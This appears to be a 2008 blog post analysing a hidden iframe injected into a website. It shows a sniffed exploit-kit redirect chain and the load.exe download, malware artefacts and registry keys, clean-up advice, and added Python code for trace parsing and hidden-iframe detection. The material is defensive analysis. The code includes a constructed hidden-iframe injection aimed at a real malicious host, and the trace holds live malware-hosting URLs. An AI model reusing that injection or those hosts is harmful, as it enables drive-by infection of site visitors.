Website with hidden iframe and Malware Analysis
It all began this morning (16/10/2008) at 13:00: I checked the HTML code of index.php and saw something suspicious inside. Our index.php and four other .php pages had been infected with an iframe from 11:00 to 13:00; fortunately we check the code of our site every 2 to 3 hours, and we removed the infected code immediately.
I decided to analyze the iframe code and used an old, unpatched version of Internet Explorer 6.0 to make sure I got infected. I visited the iframe's URL and after a few seconds a massive malware infection started, and my computer began connecting to a lot of different IPs.
Here is the network traffic that was sniffed:
GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn
Connection: Keep-Alive

HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default

GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com
Connection: Keep-Alive

HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php

GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com

HTTP/1.1 200 OK
Content-Length: 7880

GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2

HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73

GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475

GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2

HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close
While the traffic sniffer was active, the computer was infected with malware that was downloaded to the Temp folder as winMN448Eewaoz.exe; once this file was executed, it dropped a file named ~.exe in C:\WINDOWS\system32\. The executable came down through this GET request:
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Note that load.php takes a parameter named spl with the value 5; we can assume it serves the payload for exploit ("sploit") number 5. It is then reasonable to assume that this is an exploit kit serving at least five different exploits to infect a user. The two redirects before it (fstat.cn, then mmcounter.com's /tds/in.cgi) are the typical traffic distribution chain that sits between the injected iframe and the kit itself, which is why the iframe URL on the compromised site rarely points straight at the exploit host.
Here is a short summary of the malware's activity:
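The redirect chain above can be pulled out of a capture mechanically rather than by eye. The following is an added Python example, not code from the original post: it embeds a trimmed re-typing of the sniffed trace (the hxxp:// defanging is kept in the data and undone only when following Location headers), checks that each hop was actually requested next, lists the file downloads together with their query parameters, and collects the contacted hosts as a block list. Header names and the trace layout are the ones shown above; nothing else is assumed.

```python
# Added example (not from the original post): reconstruct the redirect
# chain and the payload download from a plain-text HTTP trace.
import re
from urllib.parse import parse_qs, urlsplit

# Re-typed from the sniffed session above, trimmed to the hops and the
# load.php download.  Requests and responses are separated by blank lines.
TRACE = """\
GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn

HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default

GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com

HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php

GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com

HTTP/1.1 200 OK
Content-Length: 7880

GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2

HTTP/1.1 200 OK
Content-Length: 397312

GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com

HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
"""

def parse_messages(trace):
    """Split the trace on blank lines into request/response dicts."""
    messages = []
    for block in re.split(r"\n\s*\n", trace.strip()):
        lines = block.splitlines()
        first = lines[0].split()
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")   # first colon only
            headers[name.strip().lower()] = value.strip()
        if first[0].startswith("HTTP/"):
            messages.append({"kind": "response", "status": int(first[1]), "headers": headers})
        else:
            messages.append({"kind": "request", "path": first[1], "headers": headers})
    return messages

def exchanges(trace):
    """Pair each request with the response that follows it."""
    pairs, pending = [], None
    for m in parse_messages(trace):
        if m["kind"] == "request":
            pending = m
        elif pending is not None:
            pairs.append((pending, m))
            pending = None
    return pairs

def request_url(req):
    return "http://" + req["headers"].get("host", "") + req["path"]

def redirect_chain(trace):
    """Every 3xx hop, and whether the very next request really went there."""
    pairs, hops = exchanges(trace), []
    for i, (req, resp) in enumerate(pairs):
        location = resp["headers"].get("location")
        if 300 <= resp["status"] < 400 and location:
            target = re.sub(r"^hxxp", "http", location, flags=re.I)  # undo defanging
            followed = i + 1 < len(pairs) and request_url(pairs[i + 1][0]) == target
            hops.append({"from": request_url(req), "to": target, "followed": followed})
    return hops

def payload_downloads(trace):
    """Responses that hand the browser a file, with the request's query parameters."""
    found = []
    for req, resp in exchanges(trace):
        m = re.search(r'filename="?([^";]+)', resp["headers"].get("content-disposition", ""))
        if m:
            params = {k: v[0] for k, v in parse_qs(urlsplit(req["path"]).query).items()}
            found.append({"url": request_url(req), "filename": m.group(1),
                          "size": int(resp["headers"].get("content-length", "0")),
                          "params": params})
    return found

def contacted_hosts(trace):
    """Distinct Host headers in order of first contact (block list / IOCs)."""
    hosts = []
    for req, _ in exchanges(trace):
        host = req["headers"].get("host")
        if host and host not in hosts:
            hosts.append(host)
    return hosts

if __name__ == "__main__":
    for hop in redirect_chain(TRACE):
        print(f"{hop['from']} -> {hop['to']} (followed: {hop['followed']})")
    print(payload_downloads(TRACE))
    print(contacted_hosts(TRACE))
```

The `followed` flag matters in practice: a redirect that the browser did not follow (because of a filter, or a user-agent check on the TDS) tells you the capture stops short of the real kit, so the host list would be incomplete.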
- Downloaded in Temp Folder as winMN448Eewaoz.exe
- Copied to C:\WINDOWS\system32\~.exe
- Injected code into svchost.exe
- Opened remote connections to IP 66.232.116.2 on port 80
After some time other files were downloaded to my system. I started Rootkit Unhooker and noticed some suspicious drivers in the Driver List, which made me suspect stealth malware or rootkit activity.
If you open Properties on the rnvrnrrv.sys entry in the driver column, the file is reported as 0 bytes, with no creation or modification information. Why 0 bytes and no file information at all?
The kernel driver rnvrnrrv.sys is loaded but hidden from Explorer searches (the driver seems to hide every file whose name matches *rnvrnrrv*), which is why the file system view cannot report anything about it. The hidden-but-loaded state itself is the signal: a driver that appears in the loaded-module list but not on disk should be treated as a rootkit until proven otherwise.
Below is the PE import table of rnvrnrrv.sys. It is small, and the combination of ZwQuerySystemInformation (used from kernel mode to enumerate loaded modules) with RtlImageDirectoryEntryToData (used to walk a module's export or import directories) is consistent with a driver that locates kernel code in order to patch or hook it:
+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3
Here is a list of all files created by the malware (in no particular order):
C:\WINDOWS\msauc.exe
C:\WINDOWS\system32\*randomnumber*.cpx
C:\WINDOWS\system32\*randomnumber*.dat
C:\WINDOWS\system32\wpv*randomnumber*.cpx
C:\WINDOWS\system32\msansspc.dll
%TempFolder%\winMN448Eewaoz.exe
%ProgramFiles%\xeifh\SetActAdm.dll
%ProgramFiles%\Internet Explorer\msansspc.dll
C:\WINDOWS\system32\drivers\rnvrnrrv.sys
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\system32\fqqtiaag.tmp
C:\WINDOWS\TDEZAALK.exe
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
The malware created the following registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]
This is a HijackThis log with the malware traces:
Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)
What can we do if our website is infected?
- Clean the infected HTML/PHP pages
- Change the username and password of the FTP account
- Change the username and password of the email account
- Change the username and password of the SSH account
- Contact the server administrator and explain the situation
- Check your PHP files for possible vulnerabilities
- Update all installed software (blog, forum, etc.)
- Remember never to pull a backup of the (possibly infected) site files from the web server down to your PC
- Always keep a clean local copy of the website files and restore from that copy
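Both the periodic check the author describes (reading the site's HTML every few hours) and the first step of the clean-up can be automated. The following is an added Python example, not the author's script: it hashes the PHP/HTML/JS files under a web root against a baseline taken when the site was known clean, and flags iframes that are hidden by size, CSS or off-screen positioning. The demo builds a temporary site, records the baseline, then appends a constructed iframe modelled on the first request in the sniffed trace to show both checks firing. The file extensions, the hidden-iframe heuristics and the injected tag are assumptions for the demo; the baseline file belongs off the server, next to the local copy the last two items recommend.

```python
# Added example (not the author's code): detect injected hidden iframes and
# integrity drift against a known-good baseline of a web root.
import hashlib
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
# Heuristics for an iframe meant to be invisible: zero/one pixel size,
# hidden via CSS, or positioned far off-screen.  These are assumptions.
HIDDEN_HINTS = [
    re.compile(r'\b(?:width|height)\s*=\s*["\']?\s*[01]\b', re.I),
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"(?:left|top)\s*:\s*-\d{3,}", re.I),
]
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def find_hidden_iframes(html):
    """Return the src of every iframe that looks deliberately hidden."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        if any(p.search(tag) for p in HIDDEN_HINTS):
            m = SRC_RE.search(tag)
            hits.append(m.group(1) if m else tag)
    return hits

def file_hashes(root, exts=(".php", ".html", ".htm", ".js")):
    """SHA-256 of every web file under root, keyed by relative path."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as f:
                    out[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return out

def scan_site(root, baseline):
    """Integrity drift against the baseline plus hidden iframes per file."""
    current = file_hashes(root)
    report = {
        "changed": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "iframes": {},
    }
    for rel in current:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as f:
            hits = find_hidden_iframes(f.read())
        if hits:
            report["iframes"][rel] = hits
    return report

# Constructed demo content.  The iframe is modelled on the first request of
# the sniffed trace (fstat.cn/in.cgi?id111); the page itself is invented.
CLEAN_INDEX = "<html><body><h1>Welcome</h1><?php include 'news.php'; ?></body></html>\n"
INJECTED_IFRAME = ('<iframe src="http://fstat.cn/in.cgi?id111" width=1 height=1 '
                   'style="visibility:hidden"></iframe>')

def demo():
    """Take a clean baseline, simulate the compromise, return the scan report."""
    root = tempfile.mkdtemp()
    index = os.path.join(root, "index.php")
    with open(index, "w") as f:
        f.write(CLEAN_INDEX)
    baseline = file_hashes(root)          # recorded while the site is known clean
    with open(index, "a") as f:           # the attacker appends the iframe
        f.write(INJECTED_IFRAME + "\n")
    return scan_site(root, baseline)

if __name__ == "__main__":
    print(demo())
```

Run `file_hashes()` over a clean copy and store the result (for example as JSON) on a machine the web server cannot reach; any `changed` or `added` entry on the next run is a file to inspect, whether or not the iframe heuristics match, since the next injection may use obfuscated JavaScript instead of a plain iframe.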